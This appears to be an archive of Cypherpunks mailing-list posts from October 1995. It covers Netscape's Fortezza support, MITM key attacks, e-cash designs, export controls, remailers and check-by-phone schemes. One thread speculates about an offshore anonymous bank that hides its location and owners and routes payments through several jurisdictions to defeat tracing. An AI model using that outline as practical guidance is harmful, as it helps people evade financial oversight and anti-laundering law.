Fortezza security card, a security technology based on US
government standard cryptography, as a low-cost upgrade
capability for its Netscape Navigator(TM) client software
and other Netscape products. The new capability will
enhance Netscape's offerings for the US government market
and enable the company to provide increased support for
security services for World Wide Web-based tools and
technology.

Developed by the National Security Agency, Fortezza PC
card technology provides strong authentication and
encryption services using US government standard
cryptography, implemented in an industry-standard PCMCIA
security token.  Fortezza PC cards are being used in the
Defense Message System (DMS), a new Department of Defense
electronic messaging system; Intelink, the new US
Government Intelligence Community search system based on
Web technology, and in a number of other government
systems.

"Fortezza is an important technology for major internal
US government networks and for organizations needing
Web-based technology with strong security," said Marc
Andreessen, vice president of technology at Netscape. 
"Support of Fortezza technology will strengthen our
position as a leading supplier of Web-based software
products to the federal government.  We can use the
experience gained with Fortezza and the Secure Sockets
Layer open protocol to implement support for additional
cryptographic devices important to both the federal
government and commercial markets."

Netscape expects to work with information security
specialist Litronic Industries and others regarding the
development, integration and support of the Fortezza
cryptographic interface.  Litronic provides technical
expertise for the implementation of Fortezza libraries
and drivers on a wide variety of platforms. 
California-based Litronic Industries designs,
manufactures and markets information security products
used to secure applications and data transmissions
through the use of encryption technology.

Support for Fortezza has been added to Netscape's Secure
Sockets Layer (SSL) open protocol.  SSL provides a
straightforward method for adding strong security to
existing applications and network infrastructures.  SSL
is application protocol independent and provides
encryption, which creates a secured channel to prevent
others from tapping into the network; authentication,
which uses certificates and digital signatures to verify
the identity of parties in information exchanges and
transactions; and message integrity, which ensures that
messages cannot be altered en route.  Netscape will
upgrade Netscape Navigator and other Netscape products to
support the use of Fortezza with SSL as an enhanced
alternative to software-based cryptographic mechanisms.

"The US government is rapidly moving to World Wide Web
and related open systems technology as an alternative to
proprietary networks and applications," said Paul A.
Strassmann, former director of defense information and
principal deputy assistant secretary of defense, and
currently distinguished visiting professor of information
warfare at the National Defense University.  "Many
federal agencies are adopting Fortezza technology as a
means to secure network transactions over unclassified
and classified networks.  We are pleased to see Netscape
provide support for Fortezza cryptographic cards in a
commercial product based on open systems standards."

Contact:  Kristina Lessing of Netscape, 415-528-2661, or
kristina@netscape.com












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 11 Oct 95 15:22:40 PDT
To: anon-remailer@utopia.hacktic.nl (Anonymous)
Subject: Re: MITM evasion MITM evasion
In-Reply-To: <199510110855.JAA17966@utopia.hacktic.nl>
Message-ID: <199510112222.SAA21067@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous, claiming to be Tim May, writes:
>Two years ago, I pointed out that getting a single message past
>the man in the middle isn't good enough; you have to convince your
>readers that the key they received on one channel is more accurate
>than the key they're receiving on all the other channels.
>But if they'll believe that, they may also believe the man in the middle's
>announcement that the key in your name on all the keyservers is
>wrong, and the correct key is the one he's putting out.
>Can't win either way, but it's still important to get the key out.

I see two general categories of MITM attacks.  In one case, Mitch wants
to eavesdrop on Alice and Bob, but doesn't really care about other
communication they do.  In the other, Mitch wants to know about all of
Alice's communications, regardless of with whom they are.

Public key cryptography turns the first case into two instances of the
second.  If Mitch doesn't control all of both Alice and Bob's
communications with everyone, they will eventually discover that the key
they're using for the other isn't the same one everyone else uses.

In the second MITM model, Mitch has an unbelievable task.  Any public
key that goes from Alice to anyone else, or vice versa, must be
substituted with one Mitch holds.  Any messages *about* public keys
must be transformed into messages about the corresponding MITM keys.

This includes telephone conversations where Alice and Bob exchange
keyids, the business card Eve has printed with her keyid and gives
to Alice at Interop, the Betsi key Alice can read in the newspaper,
WWW pages, files FTP'd, and face-to-face meetings.

Anything short of total control gives Alice an opportunity to learn
about Mitch's presence.  If Alice can exploit the hole enough to get
one good key, Mitch must change his tactics to denial of service
with respect to that key, or Alice can ask the key owner for other
good keys.

If Mitch can successfully surround Alice in such a cloud, I submit
at least one of the following statements is true:

1. Alice is such a non-entity that no one really wants to communicate
with her.

2. Bob can safely assume that the new key he just got isn't really from
Alice, because an Alice-with-a-life surrounded by a nearly successful
Mitch-cloud wouldn't be sending out keys --- she'd be sending out
messages saying "HELP ME!!  I'M LOCKED IN MITCH'S SECRET BOMB
SHELTER!!!"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 11 Oct 95 14:29:04 PDT
To: cypherpunks@toad.com
Subject: Re: Checksums for current beta versions of Netscape Navigator
In-Reply-To: <199510110921.CAA29849@ammodump.mcom.com>
Message-ID: <45hcsq$9i4@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


'sabout time.

In article <199510110921.CAA29849@ammodump.mcom.com>,
Jeff Weinstein  <jsw@netscape.com> wrote:
>  This file was signed using my private key.  It can be obtained from
>my web page using this URL:
>
>	http://home.netscape.com/people/jsw/my-pgp-key.txt

He put his private key on his web page?  Um, maybe not... :-)

   - Ian "Oh, no.  Not again."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 11 Oct 95 17:31:05 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
Message-ID: <v02120d04aca21d2bcd71@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



As I pointed out to Ian on Sunday, this is a very old,
very well-known bug. As I also pointed out, it is a well-
understood fact about Internet security as it stands today
that if you can't trust the people on your subnet, you're
screwed. I also mentioned the facts that have been mentioned
by others on this list (firewalls, most home users don't use
NFS, etc.)

It is profoundly irritating to find this splashed on the
front page of the NYT, contributing to the FUD that
largely benefits luddites like First Virtual and
those, like MS$, pushing for a return to proprietary networks.
(One quote from FV marketing director Pierre Wolfe at the ML
conference I recently attended, "The Internet may end up
as a ghetto, where people are afraid to engage in commercial
activity.")

Furthermore, neither the original post nor the NYT article
places any blame on the role of government regulation or
greedy patent-holders in disrupting the formation of protocols
based on strong cryptography, which are two of the major culprits
in this matter.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 11 Oct 95 15:43:53 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Banque des Cypherpunks
In-Reply-To: <28715.9510111748@exe.dcs.exeter.ac.uk>
Message-ID: <199510112243.SAA21752@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


aba@atlas.ex.ac.uk writes:
>Technologically it would be possible to have multiple ombudsmen, or
>even have the recovery key be secret share split amongst ecash users
>in such a way that some chosen percentage of agreement would be
>required before cash could be traced, or revoked (made worthless).

I don't remember if any key-splitting schemes currently allow it, but how
about this:  the escrow agencies would be the courts, requiring one
assent from each judge on the appeals chain.  As each judge rules
against the defendant or denies the appeal, he adds his piece of the
key to the ruling.  When you reach the top of the chain, then *and only
then* can you be traced.

I'm not really sure if this would apply in the ecash situation, since
you don't have a defendant until you've done the trace, but it sounds
like a legitimate safest solution in the case of GAK.  One can hardly
argue that the government has illegally revealed the keys when the
whole legal system has approved it.

NB:  I'm *strongly* opposed to GAK in principle.  I don't personally
think there's any such thing as a "legitimate need for law enforcement"
to listen in on private individuals.  A free man shouldn't have to
arrange for his life to be convenient for his servants --- private or
civil, it should be the other way around.  I'm just noting that,
working from the common notion of "legal", this system would make
illegal key seizure unlikely.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@santafe.edu>
Date: Wed, 11 Oct 95 17:13:41 PDT
To: cypherpunks@toad.com
Subject: anonymous web pages?
Message-ID: <199510120018.SAA12399@nelson.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


Does any facility currently exist to allow people to create anonymous
web pages? After anonymous email and anonymous news postings, this is
an obvious next step.

It seems that it would be a fairly simple matter to write a program
that would accept email containing a web page and the destination URL,
do some checking, and then create (or update) the requested page.
Require signatures and allow receiving mail via a remailer chain, and
you've got secure anonymous web pages.

The hard part would be finding a site that would be willing to serve
anonymous pages. I don't understand the politics at various sites that
allow anonymous remailers: maybe this isn't much harder?

-- 
                                __                      
nelson@santafe.edu              \/              http://www.santafe.edu/~nelson/
PGP key 9D719FAD   Fingerprint 3B 9B 8E 58 1C 90 57 3E  B7 99 ED 13 65 2E 0B 24




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdavidm@iconz.co.nz (David Murray)
Date: Tue, 10 Oct 95 22:59:59 PDT
To: cypherpunks@toad.com
Subject: Banque des Cypherpunks
Message-ID: <pnr828410657q@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

C'punks,

What would a cypherpunk bank (being a bank the style of which some cypherpunks
would not hate too much :-) look like? How could it be made safe to run?

One avenue of safety - shepherding the idea through SEC etc scrutiny so as to
render the venture completely legal seems to lack something of a c'punk
flavour. After all, one idea that some of us are quite taken with is that
strong crypto and the changes it brings are not only important (they are), nor
good (as Tim has pointed out - it depends where you stand) but *inevitable*.

So, how safe would a cp style bank be today?

There seem to be a number of possible pressure points: the machine, the
operators, the managers/directors, the owners, the assets, getting money out of
the system and getting money into the system.

The Machine

The easiest way to shut down an ebank is probably to unplug the machine the
software is running on and take it away. A variation of this is to cut off
net/telecomms access, or even electricity. (In the US/UK/NZ etc this would
not seem to be too difficult - lie to a judge about a bit of child porn and
you can pretty much take what you like.) Restricting ourselves to legitimate
securities/banking enforcement, however, it would seem to be enough to move
the box to some appropriate offshore site away from the major markets for
the bank's services. Obviously, there is no need to actively advertise the 
physical location of the processor...

The Operators

Even if the authorities of the target jurisdictions (US, Europe, Asia) can't
reach the operators of the machine while they are tending to it, they could,
presumably, make it difficult for those people to leave their jurisdictions
once they had entered them - by, for instance, issuing arrest warrants, or
holding trials in absentia. Again, if the physical location of the machine
is sufficiently obfuscated, this attack can be foiled.

The Managers/Directors

Assuming the bank is some kind of artificial legal entity, it will require
some other legal entity to control its actions. That controlling entity
could be themselves an artificial legal entity - for instance, a corporate
director of an offshore company.

The Owners

Assuming the bank itself is not a natural person, it will be owned by someone
(at least one list member has indicated an interest in investing in some form
of ebank). These owners could be the subject of pressure. Using the same
technology that made the ecash anonymous, the ownership of the bank could be
made similarly unknowable.

The Assets

A bank isn't going to last long if the SEC can just take its 'deposits'. 
Fortunately there are still a number of jurisdictions left where the bank's
bank account should be safe.

Getting Money out of the System

Eventually Tim is going to want to turn his Blacknet earnings into USD to
reinforce his security perimeter. How do we stop the Feds effectively
making it illegal to receive cheques from Banque des Cp? Presumably, BCp
instructs its banks to issue bank cheques, or get bank cheques from other
banks. Receiving wire transfers from Citibank may be notifiably suspicious,
but that just makes you one of millions...

Getting Money into the System

This strikes me as the most serious problem. If we differentiate between
big ticket (wholesale pharmaceutical type) and small ticket (remailer stamp
type) transactions, it might just be possible that the former could be
managed without bringing down the wrath of the authorities on the customers
(having failed to effectively attack the bank). Essentially the idea is to
route payments through enough appropriate jurisdictions that tracing back
from the ebank to the customer is impossible (or, rather, unlikely). Sticking
a Libyan bank in the chain could help, for instance...

But small ticket transactions can't use this route. The easiest thing to do
would be to accept credit cards - but it wouldn't take much to convince Visa
and Mastercard not to let their services be used, if not turn over details
of everyone who tried to buy ecash. Cheques, TTs etc seem too cumbersome to
be marketable, and, once again, too easy to trace - at least at first glance.

The problem stems, I think, from trying to satisfy two seemingly opposed
requirements - the customer must be sure who they are paying, but the
authorities must not know the customer is paying the bank.

Any ideas?

[Another problem occurs to me. Alice's Awsome XXX CD-Rom Shoppe accepts
BCp's BlackCash[TM]. Simon from the SEC buys a CD with BlackCash. "Asian
Teenage Leather Maidens" duly arrives, and Simon arrests Alice for dealing
in unauthorised securities (and unauthorised dealing in securities etc)...]

I think I'll stop before I talk myself out of the whole thing :-)

Cheers

Dm


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHtVEVlo3j8JHzalAQHT9wP/TV0AN7o4/yfkKw3G4SPrZWUO+LUFdDnD
a9v6OKUZZ8LrPQ/XORq3dvtOFtJ6GNiOPZkAWQQI9Rm792PcW4mdF+ppKynjgt0A
olK/wFnbBVhYwoEOXvqaC+ZwCTbaewpydEi3OEPGRoXbpDaYxQkfAj7K0dPT21sz
TjV5qM+rt+M=
=dTqF
-----END PGP SIGNATURE-----

[Palmtop News Reader - Beta Version 3]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 11 Oct 95 15:36:23 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: CoCom and Crypto Export
Message-ID: <199510112236.SAA18415@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I just sent this to the firewalls list in reply to a message there, but I 
thought it might be of interest here too. 

-Futplex <futplex@pseudonym.com>
hmmm, haven't seen any mail from the list in a suspiciously long time....

Forwarded message:
> Subject: Re: International Encryption Protocols
> To: Firewalls@GreatCircle.COM
> Date: Wed, 11 Oct 1995
> 
> Ted Doty writes:
> > Certainly the signatory countries to the CoCom treaty all enforce similar
> > export controls to those enforced by the USA.  Therefore, do not go looking
> > to purchase cryptography in the UK for use outside the UK.
> 
> I think this is misleading. CoCom, the Coordinating Committee for
> Multilateral Export Controls, amounted to a non-proliferation pact to
> prevent the spread of supercomputers and other hot potatoes beyond the
> club of countries to untrusted (non-CoCom) countries. As far as I can tell it
> did not erect export barriers _between member countries_, except perhaps some
> ordinary red tape. 
> 
> Before it officially dissolved in early 1994, CoCom included, among others,
> all of the G7 plus a healthy chunk of Western Europe: Australia, Belgium, 
> Canada, Denmark, France, Germany, Greece, Italy, Japan, Luxembourg, 
> the Netherlands, Norway, Portugal, Spain, Turkey, the U.K., and the U.S.
> According to http://www.chemie.fu-berlin.de/adressen/org-fact.html, Austria, 
> Finland, Ireland, South Korea, New Zealand, Singapore, Sweden, and Switzerland
> were voluntarily cooperating with the export restrictions.
> 
> As far as CoCom was concerned, you could generally sell crypto from Britain
> to most of the net. This is a far cry from the position of the U.S. ITAR,
> which prohibits the export of strong confidentiality-protecting crypto to the
> U.K., for example.
> 
> Most of the other CoCom signatories do _not_ enforce export controls similar
> to the U.S. ones.   
> 
> [...]
> > Note: the treaty has expired, but the signatory countries seem to still be
> > willing to follow it.  Nobody really wants to see strong crypto widely
> > deployed.
> 
> Make that "No government really wants...." and I'll agree with you.
> 
> BTW, ftp://ftp.eff.org/pub/CAF/law/software-export-law contains an 
> interesting, detailed memo dated 95/03/06, from a California law firm, giving
> an "Update on Current Status of U.S. Export Administration Regulations on 
> Software Exports".
> 
> -Futplex <futplex@pseudonym.com>
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 11 Oct 95 18:56:23 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Final Roster/Reminder -- Bionomics Conference (fwd)
Message-ID: <Pine.SUN.3.91.951011183642.16286B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Here's a sign of the times:


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------- Forwarded message ----------
Date: 11 Oct 95 14:38:02 
. . .
Subject: Final Roster/Reminder -- Bionomics Conference

Dear Friends,

With a record number of 35 speakers and panelists (whew!), the program for the 
3rd Annual Bionomics Conference has been finalized.  Since our brochures were 
printed, we've added a number of interesting and thought-provoking individuals, 
including

o Lew Perelman, author of "Hyperlearning"
o Andrew Basile, author of "The SPA's Guide to Online Law"
o Morley Winograd, author of "Taking Control:  Politics in the Information Age"
o Frank Gregorsky, former chief of staff to Cong. Newt Gingrich
o Jim Griffin, Director of Technology at Geffen Records
o Don Lavoie, Director, Program on Social & Organizational Learning, George 
Mason University
o Irwin Glenn, Senior Systems Engineer, Netscape Communications
o Pat McKim, Managing Partner, Practical Strategies 
o Cindy Cooke, Director, Democratic Leadership Council of CA
o Dennis Miller, Associate Professor, Baldwin-Wallace College
. . .
What's more, for the truly tech-savvy, you can now pay for your conference 
attendance with Cybercash.  Just check our web site (www.bionomics.org).
. . .           ^^^^^^^^^




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Wed, 11 Oct 95 10:51:56 PDT
To: sdavidm@iconz.co.nz (David Murray)
Subject: Re: Banque des Cypherpunks
In-Reply-To: <pnr828410657q@iconz.co.nz>
Message-ID: <28715.9510111748@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

David Murray <sdavidm@iconz.co.nz> writes:
> One avenue of safety - shepherding the idea through SEC etc scrutiny
> so as to render the venture completely legal seems to lack something
> of a c'punk flavour. After all, one idea that some of us are quite
> taken with is that strong crypto and the changes it brings are not
> only important (they are), nor good (as Tim has pointed out - it
> depends where you stand) but *inevitable*.
>
> So, how safe would a cp style bank be today?
>
> [feasibility analysis of blacknet style payment system]

If you haven't, you should read Doug Barnes' <cman@communities.com>
recent postings on the current state of money laundering regulations.
Chilling stuff.  You can bet they are not going to like the payment
system you described, its methods of transferring funds to and
from US bank accounts would be open to many of the anti-money
laundering attacks.

It would put a lot of strain on the remailer nets to have the likes of
FinCen, FBI, CIA, NSA etc. after them.  It is the legal implications
which are the problem, if they don't like what you are doing, and can
hold that it is illegal, they will come after you with excessive
force.

Even if you could get away with it, a purely anarchistic system has
the disadvantage of lack of take up: if no one is accepting your
e-cash, you can't buy things with it.  It could be made illegal for
people to accept your e-cash, at this point only people acting
anonymously will be using it.  

I think a possible approach is to work in two stages: to first work
towards wide use of ecash, as privacy preserving as feasible with
government imposed restrictions, and then in the future work on
improving the level of privacy.

The two stage approach I think is more likely to succeed because while
there is no payment infrastructure, the hard-line blacknet style
operations run counter to the aim of speeding the uptake of ecash.

It seems to me that payment systems that escape jurisdictions by being
in cyberspace protected by strong crypto, whilst perhaps inevitable
long term, are still some way off.

I think it is useful to explore what could be achieved by getting
something less ambitious working first.

I like the distributed anarchic approach too, but let's first find
people's opinions on what is possible within the system, and see if
anything useful would be possible with these constraints.  

I would like to hear views on whether the best that can be achieved
with such constraints would be a step in the direction of a more
desirable system (with better privacy guarantees), or whether it would
instead be detrimental to the cause, say perhaps by contributing to
getting a non-privacy preserving scheme immovably fixed as a standard.


There are several approaches to ecash systems that I am aware of:

1. no anonymity - most current systems

2. "trust me" the schemes which claim anonymity, but in reality rely
   on your trust in the bank. eg Mondex

3. clipper-cash (Jakobsson) here you get to trust a (supposedly
   independent) third party

	http://www-cse.ucsd.edu/users/markus/
	http://www-cse.ucsd.edu/users/markus/revoke.ps

4. blind signatures (Chaum, Brands)

	http://www.digicash.com/
	http://www.digicash.com/publish/pu_sc.html

5. or agnostic server (Doug's paper)
   (blinding as well, just avoiding Chaum's patents)

	http://www.communities.com/paper/agnostic.html

6. anarchy - remailer net, blacknet type operation


I would discount 1 & 2 as outright undesirable, and already available
anyway.  6 would cause the regulators to throw a fit.

Of the remainder 3, 4 & 5, I think the most likely to be acceptable to
regulators is 4: clipper-cash.  Next come 4 & 5.  Chaum's blinding,
and Doug's agnostically blinding proposals.


What do people think of clipper-cash?

Basically it sets of a scheme where you have an ombudsman who is
supposed to be acting on the consumer's behalf.  Revoking privacy
requires the cooperation of both the bank and the ombudsman - the bank
on its own can't strip your privacy.

Down side: to get such a scheme past regulators the ombudsman would
probably end up being a government body, or one beholden to
government, such as banks are with all the current banking regs, re
Doug's last two posts on the subject.

The problem with clipper-cash see is that it is just as the name
implies: private until you are investigated, or until the regulators
decide to go on a fishing spree.  But better than no anonymity.

Technologically it would be possible to have multiple ombudsmen, or
even have the recovery key be secret share split amongst ecash users
in such a way that some chosen percentage of agreement would be
required before cash could be traced, or revoked (made worthless).

I would presume that the more ombudsmen there are, and the less
amenable they are to government pressures, the less likely the payment
scheme would be to be acceptable to the banking regulators.

Does clipper cash satisfy any cypherpunk goals?  Or is it the ecash
equivalent of the hated clipper, and clipper II initiatives?

A blinding agnostic or openly blinding signature based server would
obviously be preferable, but could you get such a system approved by
the regulators?

These are just questions, to see what people think are the optimal
configurations from a cypherpunks perspective, and how close to these
ideals a payment system could be and still get past the regulators.

Adam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMHwDaSnIuJ1VakpnAQHS9wQAmVqEtZI4gNLWtory4adCvkZ1hKDYleXJ
i2SM/HzvqreyVGyPyYEVWqwNasOYoUvUH/lJBt0DNjnAk1xzU2xFcjKxjjA9sOH8
tUxPbAPBNK9UJIMqMHUPCz33KDd0KYeHDJXYvW1Or+JUxRKQD065hBZZLIJqf3+K
DXcMlD4qifU=
=01vA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Barman <scott@Disclosure.COM>
Date: Wed, 11 Oct 95 15:49:31 PDT
To: nobody@connect.com.au
Subject: Re: BoS: Re: Netscape & Fortessa
In-Reply-To: <199510111620.RAA25682@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951011184837.29924D-100000@di2>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Oct 1995, Anonymous wrote:

> 
> Netscape to Offer Fortezza Cryptographic Capability for
> Its Software Products
> 
> Underscores Company's Commitment to US Government Market

<... snip ...>
 
> Support for Fortezza has been added to Netscape's Secure
> Sockets Layer (SSL) open protocol.  SSL provides a
                      ^^^^

I wonder how open a protocol is when one company proposes it, changes it at
will, and makes what looks like a token effort for acceptance for peer review
through mechanisms currently in place?

scott barman
--
scott barman                  DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com                      and I speak only for myself.
barman@ix.netcom.com
  "I don't know if security explains why the Win95 support Web servers run BSDI
   2.0--an Intel-based Unix--rather than Windows NT, which Microsoft insists is
   the ideal Web software solution.  Does Redmond know something we don't know?"
             -Robert X. Cringely, INFOWORLD, 9/11/95





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 11 Oct 95 15:51:43 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: CancelMoose = William Nagengast?
Message-ID: <199510112251.SAA32456@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mark writes:
> #define paranoia on
> 
> Just ask your local TLA that has traffic monitors on the up and down links of
> all the remailers so they can track a piece of email from sender to recipient.
> They will take the (relatively small) logs of the hour and pump out a name
> for you.
> 
> #define paranoia off
> 
> :)

That's one of the principal advantages of Mixmaster over the earlier 
generation anonymous remailers. Approaching a Chaumian digital mix more
closely than previous implementations, it uses only encrypted standard-sized
packets in transit. This protocol should make it hard or impossible to 
narrow the list down to anything like a single name, depending on ambient
traffic conditions.

-Futplex <futplex@pseudonym.com>
"Our encryption doesn't use an encryption algorithm" -Elementrix



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 11 Oct 95 18:55:19 PDT
To: cypherpunks@toad.com
Subject: Check by phone (revisited)
Message-ID: <v02120d07aca227ad455e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



There are a variety of these new "check by phone" operations
advertising on the Internet; I decided to check some of them
out this afternoon.

Most of them seem to use the same breathless prose immortalized
in "Make Money Fast", along with generous use of the Netscape
"blink" attribute, which immediately sent alarm bells ringing,
especially when coupled with referral programs that border on
a pyramid scheme. Furthermore, it's clear that these operations
are highly vulnerable to fraud and abuse, as was mentioned in a
thread on the list a few weeks back.

Quoting from http://www.pixi.com/morgan_group/checks/by_phone.html:

---------
TELEPHONE CHECKS (PAPER DRAFTS) ARE COMPLETELY LEGAL!

Paper drafts are established as a legal method of payment as provided
in the Uniform Commercial Code, Title 1, Section 1-201 [39] and Title 3,
Sections 3-104, 3-401, and 3-403; Code of Federal Regulations, Title 12
Chapter II, Part 210; and Regulation J, Federal Reserve Bank, Part 2,
Sections 4A-201 to 4A-212. Only verbal agreement is required for
authorization. Also see Romani v Harris, 255 Md 389.
---------

Any lawyers feel like checking this stuff out? (I've got
the UCC at home, but not the rest of the materials.)

When I called the phone number given at:
http://www.Village.com/business/enterprise, I got a guy who
was obviously at home, "watching the ball game"; he was quite
pushy and focused on the system of "referrals" for people who
sign up. Among other things, he had never heard of an ACH debit
and was therefore unable to compare the conflict resolution
processes for the two methods. (ACH debits are what your health
club uses to deduct fees from your checking account each month --
the transactions are reversible solely on the customer's say-so.)

The folks at http://www.redichek.com/redichek/redifaq.htm seem
a bit more professional. They admit in e-mail that there is a security
problem here (no kidding), especially wrt sending routing and
account information over the Internet. I enclose our correspondence
at the end of this posting, for your reading enjoyment.

It seems plain from the nature of the folks who are offering these
check printing services that they are not regulated or licensed.
Also, it seems that these services are really just preparing the
drafts, any liability for submitting bogus drafts rests on the merchant
into whose account the drafts are deposited.

Question: has anyone seen more legitimate folks offering this type
of service? Also, it seems that for the fees that these folks are
charging, it would be worth it for a merchant to do this in-house.
When this topic came up before, I recall people mentioning sources
of magnetic ink and check paper; is this stuff really widely available?

Another puzzling factor is that all the services seem to base the
fees on the amount of the transaction, when, as near as I can tell,
the check printer has no exposure, and costs are in no way proportional
to transaction size (basically they're collecting data and running
a laser printer.) Probably due to their positioning themselves wrt
credit card companies.

Joe-Bob sez: Check it out.

=========================================================================
Date: Wed, 11 Oct 95 18:13:57 -0600
X-Sender: msumsion@mail.redi-check.com
Mime-Version: 1.0
To: cman@communities.com (Douglas Barnes)
From: msumsion@optical.fiber.net (Michael Sumsion)
Subject: Re: Legal basis

Douglas,

Thanks for the inquiry.  Before I answer your questions, I would like to
make you aware that we are in the process of building a completely new,
completely secure system using this same check-draft service.  It will be
arriving within the next couple of weeks.  This new system will allow online
customers to make purchases, using their checking account, without the need
to transmit their account information over the Internet.

On to your questions:
>
>Hi, our company may be a potential customer of your service,
>but I have questions about the legalities involved in printing
>drafts on people's accounts. In particular, this system seems
>especially vulnerable to fraud. I just spoke with our banker,
>who had not heard of these services, and was quite concerned.

Many bankers have not heard of the system, although it has been in use now
for over 3 years.  We get calls from bankers on a regular basis who are
curious about the service.  After explaining it to them, they are generally
very supportive.  As far as the legalities, it is perfectly legal to print a
draft, drawn on a customer's account, with the authorization of the
customer.  In fact, the legal basis for this is printed on the bottom of
each of our drafts.

>For instance, wouldn't it be possible for any recipient of a
>check from someone to copy down the routing information and
>account number, and then use that to defraud the account holder
>and the merchant?

Yes, this is possible.  We have never run into this situation, however.  We
are not stating that this system is any more secure (with the current
system) than credit cards.  What we WILL say is that this system is as safe
as walking into any store and handing the clerk one of your checks.  (The
new system will eliminate the need to transmit this information.)

>Also, I'm curious where the liability rests in the event that
>a charge is disputed -- that is, the customer claims that they
>didn't authorize the transaction. How readily are the charges
>reversed? I'm familiar with ACH debits, which are extremely
>easy for customers to reverse; how does this system compare with
>ACH debits?

Since there is no standard or regulation regarding this in the banking
industry, this differs from bank to bank.  Some banks will allow you to go
back as far as two years to dispute a check.  Others will only go back 30-60
days from the date of receipt.

I hope that I've been able to answer completely.  If you would like to speak
with someone about specific processes, please give Allen a call at 801.298.1212.

Thanks,

Michael Sumsion

    _/_/_/ _/_/_/ _/_/   _/      _/_/_/ _/  _/ _/_/_/ _/_/_/ _/  _/ TM
   _/  _/ _/     _/  _/ _/      _/     _/  _/ _/     _/     _/ _/
  _/_/   _/_/   _/  _/ _/ _/_/ _/     _/_/_/ _/_/   _/     _/_/
 _/ _/  _/     _/  _/ _/      _/     _/  _/ _/     _/     _/ _/
_/  _/ _/_/_/ _/_/   _/      _/_/_/ _/  _/ _/_/_/ _/_/_/ _/  _/

 Internet Commerce Solutions - (800) 607-2001 Fax (801) 298-9789
email: msumsion@redi-check.com http://www.redi-check.com/redi-check
Referral Program: http://www.redi-check.com/redi-check/referral.htm
======================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Berger <dvberger@eit.COM>
Date: Wed, 11 Oct 95 18:51:36 PDT
To: Paul A Gauthier <gauthier@CS.Berkeley.EDU>
Subject: Re: NYT on Internet Flaws
Message-ID: <199510120159.SAA27558@viper.eit.com>
MIME-Version: 1.0
Content-Type: text/plain


[stuff deleted]

>People seem to miss that the NFS hack was only an _example_ of a powerful
>way to silently destroy the integrity of an executable. Spoofing the
>insecure FTP session they used to retrieve it works. Sending them a random
>trojan horse works. The point was not that NFS is insecure. It was that
>unless you can authenticate your executables as being trustworthy NOTHING
>ELSE MATTERS.

No I don't think the community missed the point.  While both NFS and FTP are
equally weak in the way you point out, I think you should have used FTP as
your main example because if we presume that the file server where the
binary lives is reasonably trustworthy (like the guys at Netscape haven't
inserted a trojan horse into their own binary and placed it up for FTP) then
the way the file will propagate throughout the net is FTP and not NFS.

Notwithstanding, the NY Times writer took an otherwise reasonable point and
blew it up into a "War of the Worlds" style article.  I'd make sure he
writes a decent article before quoting me in it.

David  (wondering whose stock fell because of this page one-er)
===========================================================================
David A. Berger
Software Engineer/Internet Product Development
Enterprise Integration Technologies|800 El Camino Real|Menlo Park, CA 94025
dvberger@eit.com   http://www.eit.com/~dvberger/ (415) 617-8792
===========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 11 Oct 95 16:27:37 PDT
To: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
